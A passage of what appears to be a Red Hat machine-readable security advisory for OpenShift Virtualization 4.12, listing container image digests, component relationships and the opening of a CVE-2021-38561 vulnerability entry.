"pkg:oci/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.12.0-89", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", }, product_reference: "container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", }, product_reference: "container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64 as a component of CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", relates_to_product_reference: "8Base-CNV-4.12", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", 